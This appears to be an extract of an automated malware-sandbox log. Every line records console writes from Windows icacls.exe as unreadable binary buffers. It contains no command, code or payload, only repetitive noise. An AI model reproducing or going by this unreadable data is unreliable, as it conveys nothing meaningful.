Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...."..........................,.!......35......c.w..$...5...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...."...............................!$...!...Tw.....@..........X.....$.....t.!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...."..........................,.!......35......c.w..$...5.....................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...."..........................,.!......35......c.w..$...5...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...."...............................!$...!...Tw.....@..........X.....$.....t.!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....".............................w......$.t.!.....T.!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....".............................w......$.t.!.....T.!...!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...."................................$.P.!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....".............................w......$.t.!.....T.!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....#.............................w......$.t.!.....T.!...!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....#................................$.P.!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....#.............................w......$.t.!.....T.!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....#.............................w......$.t.!.....T.!...!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....#................................$.P.!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....#.............................w......$.t.!.....T.!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...%#.............................w......$.t.!.....T.!...!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...+#................................$.P.!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...1#.............................w......$.t.!.....T.!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...7#.............................w......$.t.!.....T.!...!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...=#................................$.P.!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...C#.............................w......$.t.!.....T.!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...I#.............................w......$.t.!.....T.!...!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...O#................................$.P.!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...U#.............................w......$.t.!.....T.!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...[#.............................w......$.t.!.....T.!...!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...a#................................$.P.!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...g#.............................w......$.t.!.....T.!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...m#.............................w......$.t.!.....T.!...!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...s#................................$.P.!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...y#.............................w......$.t.!.....T.!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....#.............................w......$.t.!.....T.!...!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....#................................$.P.!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...9$.............................w......$.t.!.....T.!...!.....2.....!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...?$.............................w......$.t.!.....T.!...!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...E$................................$.P.!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...]$.............................w......$.t.!.....T.!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...c$.............................w......$.t.!.....T.!...!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...i$................................$.P.!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....$.............................w......$.t.!.....T.!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....$.............................w......$.t.!.....T.!...!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....$................................$.P.!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....$.............................w......$.t.!.....T.!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....$.............................w......$.t.!.....T.!...!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....$................................$.P.!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....$..................................`.........!.p.!...!............w..@.....
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....$..................................`.........!.p.!...!...!...........@.....
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....$...............................!$...!...Tw.....@..........X.....$.....t.!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....$..........................,.!......35......c.w..$...5.....................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....$..........................,.!......35......c.w..$...5...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....$............................... $...!...Tw.....@..........X.....$.....t.!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....$..........................,.!......35......c.w..$...5.....................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....%..........................,.!......35......c.w..$...5...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....%...............................!$...!...Tw.....@..........X.....$.....t.!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....%..........................,.!......35......c.w..$...5.....................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....%..........................,.!......35......c.w..$...5...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....%...............................!$...!...Tw.....@..........X.....$.....t.!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@... %..........................,.!......35......c.w..$...5.....................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...&%..........................,.!......35......c.w..$...5...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...,%...............................!$...!...Tw.....@..........X.....$.....t.!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...@%.............................w......$...!.......!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...F%.............................w......$...!.......!...!.8.!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...L%............................... $...!...Tw.....@..........X.....!..... .!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...R%..........................L.......`...D...l.!...!...!............w..@.....
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...X%..........................L.......`...D...l.!...!...!...!...........@.....
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...^%...............................%$.l.!...Tw.....@..........X....#$.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...d%.............................w......$...!.......!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...j%.............................w......$...!.......!...!.8.!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...p%............................... $...!...Tw.....@..........X.....!..... .!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...v%..........................L.......`...D...l.!...!...!............w..@.....
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...|%..........................L.......`...D...l.!...!...!...!...........@.....
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....%..............................(%$.l.!...Tw.....@..........X....#$.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....%...........................+@......35...!...!...$...5.....................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....%...........................+@......35...!...!...$...5...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....%...............................!$...!...Tw.....@..........X.....$.....t.!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....%..........................,.!......35......c.w..$...5.....................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....%..........................,.!......35......c.w..$...5...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....%............................... $...!...Tw.....@..........X.....$.....t.!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....%..........................,.!......35......c.w..$...5..... ...............
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....%..........................,.!......35......c.w..$...5...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....%..............................8!$...!...Tw.....@..........X.....$.....t.!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....%..........................,.!......35......c.w..$...5.....................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....%..........................,.!......35......c.w..$...5...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....%...............................!$...!...Tw.....@..........X.....$.....t.!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....%.............................w......$...!.......!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....%.............................w......$...!.......!...!.8.!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....%............................... $...!...Tw.....@..........X.....!..... .!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....%.............................w......$...!.......!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....%.............................w......$...!.......!...!.8.!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....%............................... $...!...Tw.....@..........X.....!..... .!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....%...........................+@......35...!...!...$...5.....................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....%...........................+@......35...!...!...$...5...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....&............................... $...!...Tw.....@..........X.....$.....t.!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....&..........................,.!......35......c.w..$...5.....................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....&..........................,.!......35......c.w..$...5...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....&...............................!$...!...Tw.....@..........X.....$.....t.!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....&..........................,.!......35......c.w..$...5.....................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....&..........................,.!......35......c.w..$...5...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...$&............................... $...!...Tw.....@..........X.....$.....t.!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...*&..........................,.!......35......c.w..$...5.....................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...0&..........................,.!......35......c.w..$...5...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...6&............................... $...!...Tw.....@..........X.....$.....t.!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...<&..........................,.!......35......c.w..$...5.....6...............
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...B&..........................,.!......35......c.w..$...5...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...H&..............................X!$...!...Tw.....@..........X.....$.....t.!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...N&.............................w......$...!.......!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...T&.............................w......$...!.......!...!.8.!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...Z&............................... $...!...Tw.....@..........X.....!..... .!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...`&.............................w......$...!.......!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...f&.............................w......$...!.......!...!.8.!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...l&...............................!$...!...Tw.....@..........X.....!..... .!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...r&.............................w......$...!.......!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...x&.............................w......$...!.......!...!.8.!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...~&............................... $...!...Tw.....@..........X.....!..... .!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....&.............................w......$...!.......!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....&.............................w......$...!.......!...!.8.!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....&............................... $...!...Tw.....@..........X.....!..... .!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....&..........................L.......`...D...l.!...!...!............w..@.....
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....&..........................L.......`...D...l.!...!...!...!...........@.....
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....&...............................%$.l.!...Tw.....@..........X....#$.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....&............................!......35......c.w.#$...5.....................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....&............................!......35......c.w.#$...5...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....&..............................8%$.l.!...Tw.....@..........X....#$.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....&............................!......35......c.w.#$...5.....................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....&............................!......35......c.w.#$...5...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....&..............................(%$.l.!...Tw.....@..........X....#$.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....&............................!......35......c.w.#$...5.....................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....&............................!......35......c.w.#$...5...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....&...............................%$.l.!...Tw.....@..........X...."$.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....&...........................+@......35...!...!...$...5.....................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....&...........................+@......35...!...!...$...5...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....&............................... $...!...Tw.....@..........X.....$.....t.!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....&..........................,.!......35......c.w..$...5..... ...............
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....&..........................,.!......35......c.w..$...5...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....&..............................8!$...!...Tw.....@..........X.....$.....t.!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....'.............................w......$...!.......!...!.....F.....!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....'.............................w......$...!.......!...!.8.!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....'..............................8!$...!...Tw.....@..........X.....!..... .!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....'..........................L.......`...D...l.!...!...!.....J......w..@.....
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....'..........................L.......`...D...l.!...!...!...!...........@.....
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@... '...............................%$.l.!...Tw.....@..........X...P#$.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...&'...........................+@......35...!...!...$...5.....................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...,'...........................+@......35...!...!...$...5...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...2'............................... $...!...Tw.....@..........X.....$.....t.!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...8'..........................,.!......35......c.w..$...5.....................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...>'..........................,.!......35......c.w..$...5...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...D'...............................!$...!...Tw.....@..........X.....$.....t.!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...J'..........................,.!......35......c.w..$...5.....................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...P'..........................,.!......35......c.w..$...5...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...V'...............................!$...!...Tw.....@..........X.....$.....t.!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...\'..........................,.!......35......c.w..$...5.....................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...b'..........................,.!......35......c.w..$...5...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...h'............................... $...!...Tw.....@..........X.....$.....t.!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...n'.............................w......$.t.!.....T.!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...t'.............................w......$.t.!.....T.!...!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...z'................................$.P.!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....'.............................w......$.t.!.....T.!...!..... .....!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....'.............................w......$.t.!.....T.!...!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....'................................$.P.!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....'.............................w......$.t.!.....T.!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....'.............................w......$.t.!.....T.!...!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....'................................$.P.!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....'.............................w......$.t.!.....T.!...!.....".....!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....'.............................w......$.t.!.....T.!...!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....'................................$.P.!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....'.............................w......$.t.!.....T.!...!.....(.....!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....'.............................w......$.t.!.....T.!...!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....'................................$.P.!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....'.............................w......$.t.!.....T.!...!.....(.....!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....'.............................w......$.t.!.....T.!...!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....'................................$.P.!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....'.............................w......$.t.!.....T.!...!.....$.....!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....'.............................w......$.t.!.....T.!...!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....'................................$.P.!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....'.............................w......$.t.!.....T.!...!.....,.....!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....'.............................w......$.t.!.....T.!...!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....'................................$.P.!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....'.............................w......$.t.!.....T.!...!.....$.....!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....(.............................w......$.t.!.....T.!...!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....(................................$.P.!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....(.............................w......$.t.!.....T.!...!.....$.....!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....(.............................w......$.t.!.....T.!...!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....(................................$.P.!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@..."(.............................w......$.t.!.....T.!...!.....&.....!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...((.............................w......$.t.!.....T.!...!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....(................................$.P.!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...4(.............................w......$.t.!.....T.!...!..... .....!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...:(.............................w......$.t.!.....T.!...!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...@(................................$.P.!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...F(.............................w......$.t.!.....T.!...!.....(.....!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...L(.............................w......$.t.!.....T.!...!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...R(................................$.P.!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...X(.............................w......$.t.!.....T.!...!.....(.....!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...^(.............................w......$.t.!.....T.!...!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...d(................................$.P.!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...j(.............................w......$.t.!.....T.!...!.....0.....!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...p(.............................w......$.t.!.....T.!...!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...v(.............................. .$.P.!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...|(.............................w......$.t.!.....T.!...!.....*.....!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....(.............................w......$.t.!.....T.!...!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....(................................$.P.!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....(.............................w......$.t.!.....T.!...!.....2.....!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....(.............................w......$.t.!.....T.!...!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....(.............................. .$.P.!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....(.............................w......$.t.!.....T.!...!.....(.....!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....(.............................w......$.t.!.....T.!...!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....(................................$.P.!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....(.............................w......$.t.!.....T.!...!.....(.....!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....(.............................w......$.t.!.....T.!...!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....(................................$.P.!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....(.............................w......$.t.!.....T.!...!.....T.....!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....(.............................w......$.t.!.....T.!...!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....(..............................@.$.P.!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....(.............................w......$.t.!.....T.!...!.....0.....!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....(.............................w......$.t.!.....T.!...!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....(.............................. .$.P.!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....(.............................w......$.t.!.....T.!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....(.............................w......$.t.!.....T.!...!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....(................................$.P.!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....(.............................w......$...!.......!...!.....(.....!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....).............................w......$...!.......!...!.8.!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....)...............................!$...!...Tw.....@..........X.....!..... .!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....).............................w......$...!.......!...!.....(.....!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....).............................w......$...!.......!...!.8.!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....)...............................!$...!...Tw.....@..........X.....!..... .!.
